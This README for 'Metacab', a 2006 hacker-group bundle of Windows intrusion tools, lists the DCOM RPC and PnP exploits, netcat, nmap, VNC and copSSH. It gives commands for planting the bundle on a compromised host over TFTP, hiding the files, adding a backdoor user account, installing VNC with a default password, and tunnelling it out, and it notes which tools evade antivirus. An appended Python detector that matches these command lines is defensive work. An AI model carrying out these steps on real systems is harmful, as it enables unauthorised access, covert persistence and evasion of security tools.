---------------------------------
---------------------------------
---                           ---
---   README for /\/\etacab   ---
---                           ---
---------------------------------
---------------------------------

What is Metacab?
----------------

Metacab (meta.cab) is a single, inclusive Microsoft CAB file of remote
administration tools. The CAB file and everything within it can be
decompressed, installed and used with only cmd.exe.

What's in the zip file?
-----------------------

- ddf        - Directive files for included CABs
- meta.cab   - Metacab
- README.txt - This file

What's included in meta.cab?
----------------------------

As of 2006-05-R7:

- install.bat   - Installs Metacab
- install.cab   - Which includes...
- map.bat       - Simple bat file to ping sweep a Class D
- ms03026.exe   - DCOM RPC overflow exploit
- ms05039.exe   - HOD's PnP exploit
- nc.exe        - Netcat
- nmap.cab      - Nmap CAB
- ssh.cab       - copSSH CAB
- tcpdump.exe   - Passive sniffer
- uninstall.bat - Deletes Metacab installation
- vnc.cab       - VNC CAB
- winpcap.exe   - WinPcap needed for Nmap

How do I get Metacab on to a remote host?
-----------------------------------------

Assuming you have a shell on said host, you can FTP or TFTP Metacab
over. Make sure to use binary mode! For example, using TFTP:

C:\WINDOWS\system32>tftp -i 123.45.67.89 get meta.cab c:\windows\temp\meta.cab

How do I install Metacab?
-------------------------

C:\WINDOWS\system32>cd ..\temp
C:\WINDOWS\Temp>expand meta.cab -f:* c:\windows\temp
C:\WINDOWS\Temp>install

Where did it go?
----------------

The install script uses attrib +h on the install directory, meta.cab
and uninstall.bat. They're there.

How do I uninstall Metacab?
---------------------------

Provided the respective files aren't in use...

C:\WINDOWS\Temp>uninstall

How do I use copSSH?
--------------------

C:\WINDOWS\Temp>net user sshuser p4ssw0rD /add
C:\WINDOWS\Temp>cd install\ssh
C:\WINDOWS\Temp\install\ssh>copssh /S
C:\WINDOWS\Temp\install\ssh>installssh
C:\WINDOWS\Temp\install\ssh>cd c:\progra~1\copssh\bin
C:\Program Files\copssh\bin>bash --login -c activate-user.sh

Note that activate-user.sh doesn't return if you're using a remote
cmd.exe. So make sure that's the last thing you want to do.

How do I map a network?
-----------------------

C:\WINDOWS\temp\install>map 123.45.67 > net.txt

How do I use Netcat?
--------------------

Google.

How do I use Nmap?
------------------

Install WinPcap and registry edits...

C:\WINDOWS\Temp\install>winpcap
C:\WINDOWS\Temp\install>cd nmap
C:\WINDOWS\Temp\install\nmap>regedit /s nmap_performance.reg

then refer to http://www.insecure.org.

How do I use tcpdump?
---------------------

http://www.tcpdump.org/tcpdump_man.html

How do I install VNC?
---------------------

C:\WINDOWS\Temp\install\vnc>regedit /s vncdmp.reg
C:\WINDOWS\Temp\install\vnc>winvnc -install
C:\WINDOWS\Temp\install\vnc>net start winvnc

What's the VNC password?
------------------------

password

How do I remove VNC?
--------------------

C:\WINDOWS\Temp\install\vnc>net stop winvnc
C:\WINDOWS\Temp\install\vnc>winvnc -remove

How do I tunnel VNC through SSH?
--------------------------------

C:\WINDOWS\Temp\install\ssh>regedit /s vncssh.reg

$ ssh sshuser@HOST -L 5900:127.0.0.1:5900

Then connect to localhost:5900.

What about antivirus?
---------------------

As of this release, Netcat eludes antivirus detection.
ms05039 sometimes eludes antivirus.
ms03026 is detected by antivirus.

I don't trust you...
--------------------

We don't blame you. You can always download the sources yourself and
use the DDFs to make your own CABs.

Where can I get the sources?
----------------------------

copSSH              - http://www.itefix.no/copssh/
Exploits and Netcat - http://www.packetstormsecurity.org/
Nmap                - http://download.insecure.org/nmap/dist/
TCPDUMP             - http://www.microolap.com/products/network/tcpdump/
VNC                 - http://www.realvnc.com/dist/vnc-3.3.7-x86_win32.zip
WinPcap             - http://www.winpcap.org/archive/

How do I make a CAB?
--------------------

makecab /f cab.ddf

Who's responsible for this?!
----------------------------

Phoenix 2600:

dre        - For suggestions
dual       - For originally putting it together
Evil1      - For suggestions
Nak        - For making Netcat invisible to antivirus
PHLAK      - For testing
XlogicX    - For hosting the project page
Zapperlink - For testing and suggestions

Thanks to Packet Storm for hosting the stable versions.
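
Added example for defenders (not part of the Metacab package and not written by its authors): the transfer, install and service commands shown in this README leave recognisable process command lines. The Python code below matches them in process-creation events and flags a host only when several fire together; the rule names, host names and sample events are constructed, and the attrib command line is an assumption because the README does not show it.

```python
import re
from collections import defaultdict

# Rules derived from the commands this README runs; rule names are hypothetical.
RULES = [
    ("tftp_binary_download", re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("cab_expand_all",       re.compile(r"\bexpand(\.exe)?\s+\S+\.cab\s+-f:\*", re.I)),
    ("attrib_hide",          re.compile(r"\battrib(\.exe)?\s+.*\+h\b", re.I)),
    ("local_user_added",     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
    ("silent_reg_import",    re.compile(r"\bregedit(\.exe)?\s+/s\s+\S+\.reg\b", re.I)),
    ("vnc_service_install",  re.compile(r"\bwinvnc(\.exe)?\s+-install\b", re.I)),
]

def scan(events):
    """Return (host, rule_name, cmdline) for every rule that matches an event."""
    hits = []
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append((ev["host"], name, ev["cmdline"]))
    return hits

def suspicious_hosts(events, min_rules=3):
    """Hosts where at least min_rules distinct rules fired.
    Each command alone is ordinary admin activity; the combination is the signal."""
    seen = defaultdict(set)
    for host, name, _ in scan(events):
        seen[host].add(name)
    return {h: sorted(r) for h, r in seen.items() if len(r) >= min_rules}

# Constructed sample events (host names are made up). WS-01 follows the README's
# command sequence; WS-02 is routine admin work that must not be flagged.
SAMPLE = [
    {"host": "WS-01", "cmdline": r"tftp -i 123.45.67.89 get meta.cab c:\windows\temp\meta.cab"},
    {"host": "WS-01", "cmdline": r"expand meta.cab -f:* c:\windows\temp"},
    {"host": "WS-01", "cmdline": r"attrib +h C:\WINDOWS\Temp\install"},  # assumed form
    {"host": "WS-01", "cmdline": r"net user sshuser p4ssw0rD /add"},
    {"host": "WS-01", "cmdline": r"regedit /s vncdmp.reg"},
    {"host": "WS-01", "cmdline": r"winvnc -install"},
    {"host": "WS-02", "cmdline": r"expand driver.cab -f:setup.inf c:\drivers"},
    {"host": "WS-02", "cmdline": r"regedit /s printer_defaults.reg"},
]

if __name__ == "__main__":
    for host, rules in suspicious_hosts(SAMPLE).items():
        print(host, rules)
```

Feed it command lines from whatever process-creation logging is available; lowering min_rules trades fewer misses for more noise from routine regedit /s and expand use.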